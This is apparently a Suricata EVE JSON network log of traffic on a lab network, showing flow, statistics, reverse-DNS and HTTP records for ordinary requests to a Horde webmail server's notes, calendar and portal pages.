{"timestamp":"2020-02-29T00:10:00.000926+0000","flow_id":2220367811436415,"event_type":"flow","src_ip":"192.168.10.122","src_port":38736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:59.384895+0000","end":"2020-02-29T00:04:59.493660+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:03.000233+0000","event_type":"stats","stats":{"uptime":14255,"capture":{"kernel_packets":134305,"kernel_drops":0},"decoder":{"pkts":134306,"bytes":92745032,"invalid":185,"ipv4":132831,"ipv6":8,"ethernet":134306,"raw":0,"null":0,"sll":0,"tcp":127639,"udp":4992,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2734,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2750,"synack":2741,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1775,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2278,"failed_udp":110},"tx":{"http":4574,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2357}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2338,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked"
:65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17523,"memcap_state":0,"memcap_global":0},"http":{"memuse":70626,"memcap":0}}} {"timestamp":"2020-02-29T00:10:04.262384+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35647,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:04.370921+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52542,"proto":"UDP","dns":{"type":"answer","id":35647,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:04.370921+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52542,"proto":"UDP","dns":{"type":"answer","id":35647,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:04.390563+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} 
{"timestamp":"2020-02-29T00:10:04.390563+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:10:05.000419+0000","flow_id":607994139066563,"event_type":"flow","src_ip":"192.168.10.122","src_port":54065,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:03.934083+0000","end":"2020-02-29T00:05:04.042931+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:06.002843+0000","flow_id":473067756685678,"event_type":"flow","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":22,"bytes_toserver":3149,"bytes_toclient":20072,"start":"2020-02-29T00:08:55.297326+0000","end":"2020-02-29T00:09:05.483858+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:10:07.000736+0000","flow_id":1380207798145143,"event_type":"flow","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1182,"bytes_toclient":709,"start":"2020-02-29T00:08:38.282743+0000","end":"2020-02-29T00:09:06.456416+0000","age":28,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:07.026085+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34784,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:10:07.034032+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38273,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:07.142311+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45470,"proto":"UDP","dns":{"type":"answer","id":38273,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:07.142311+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45470,"proto":"UDP","dns":{"type":"answer","id":38273,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:07.185699+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:10:07.185699+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":215,"tx_id":1}} {"timestamp":"2020-02-29T00:10:07.203534+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58586,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14810,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:10:07.311742+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58586,"proto":"UDP","dns":{"type":"answer","id":14810,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:07.311742+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58586,"proto":"UDP","dns":{"type":"answer","id":14810,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:07.439849+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4933}} {"timestamp":"2020-02-29T00:10:08.000384+0000","flow_id":871962829359369,"event_type":"flow","src_ip":"192.168.10.122","src_port":37139,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:07.362761+0000","end":"2020-02-29T00:05:07.471041+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:10.000161+0000","event_type":"stats","stats":{"uptime":14262,"capture":{"kernel_packets":134318,"kernel_drops":0},"decoder":{"pkts":134333,"bytes":92755292,"invalid":185,"ipv4":132858,"ipv6":8,"ethernet":134333,"raw":0,"null":0,"sll":0,"tcp":127660,"udp":4998,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2735,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2751,"synack":2742,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1776,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2281,"failed_udp":110},"tx":{"http":4577,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2360}},"flow_mgr":{"closed_pruned":2718,"new_pruned":15,"est_pruned":2340,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17855,"memcap_state":0,"memcap_global":0},"http":{"memuse":122290,"memcap":0}}} 
{"timestamp":"2020-02-29T00:10:12.000172+0000","flow_id":1278752082539280,"event_type":"flow","src_ip":"192.168.10.130","src_port":34774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1233,"bytes_toclient":7100,"start":"2020-02-29T00:09:06.439056+0000","end":"2020-02-29T00:09:11.765350+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:12.397307+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34784,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4933},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":20631,"tx_id":2}} {"timestamp":"2020-02-29T00:10:14.000441+0000","flow_id":212195723528106,"event_type":"flow","src_ip":"192.168.10.122","src_port":46499,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:13.280490+0000","end":"2020-02-29T00:05:13.388520+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:16.000681+0000","flow_id":127932775662908,"event_type":"flow","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1233,"bytes_toclient":1174,"start":"2020-02-29T00:09:10.329020+0000","end":"2020-02-29T00:09:15.522203+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:16.614511+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34781,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30292,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:16.722829+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34781,"proto":"UDP","dns":{"type":"answer","id":30292,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:16.722829+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34781,"proto":"UDP","dns":{"type":"answer","id":30292,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:16.870668+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6981}} {"timestamp":"2020-02-29T00:10:17.000180+0000","event_type":"stats","stats":{"uptime":14269,"capture":{"kernel_packets":134333,"kernel_drops":0},"decoder":{"pkts":134338,"bytes":92755574,"invalid":185,"ipv4":132861,"ipv6":8,"ethernet":134338,"raw":0,"null":0,"sll":0,"tcp":127663,"udp":4998,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2735,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2751,"synack":2742,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1776,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2281,"failed_udp":110},"tx":{"http":4577,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2360}},"flow_mgr":{"closed_pruned":2719,"new_pruned":15,"est_pruned":2341,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17855,"memcap_state":0,"memcap_global":0},"http":{"memuse":87374,"memcap":0}}} 
{"timestamp":"2020-02-29T00:10:18.000391+0000","flow_id":2001607963729589,"event_type":"flow","src_ip":"192.168.10.130","src_port":34778,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4177,"start":"2020-02-29T00:09:12.614069+0000","end":"2020-02-29T00:09:17.822939+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:21.748959+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6981},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37763,"tx_id":0}} {"timestamp":"2020-02-29T00:10:21.758965+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41533,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12570,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:21.866749+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41533,"proto":"UDP","dns":{"type":"answer","id":12570,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:21.866749+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41533,"proto":"UDP","dns":{"type":"answer","id":12570,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.444617+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24342}} {"timestamp":"2020-02-29T00:10:22.621298+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24342},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:10:22.629755+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33644,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:10:22.738168+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44212,"proto":"UDP","dns":{"type":"answer","id":33644,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:22.738168+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44212,"proto":"UDP","dns":{"type":"answer","id":33644,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.795647+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:10:22.795647+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:10:22.824684+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":2}} {"timestamp":"2020-02-29T00:10:22.840079+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42445,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23346,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:22.948426+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42445,"proto":"UDP","dns":{"type":"answer","id":23346,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:22.948426+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42445,"proto":"UDP","dns":{"type":"answer","id":23346,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.978088+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53812,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2192,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:23.086656+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53812,"proto":"UDP","dns":{"type":"answer","id":2192,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:23.086656+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53812,"proto":"UDP","dns":{"type":"answer","id":2192,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 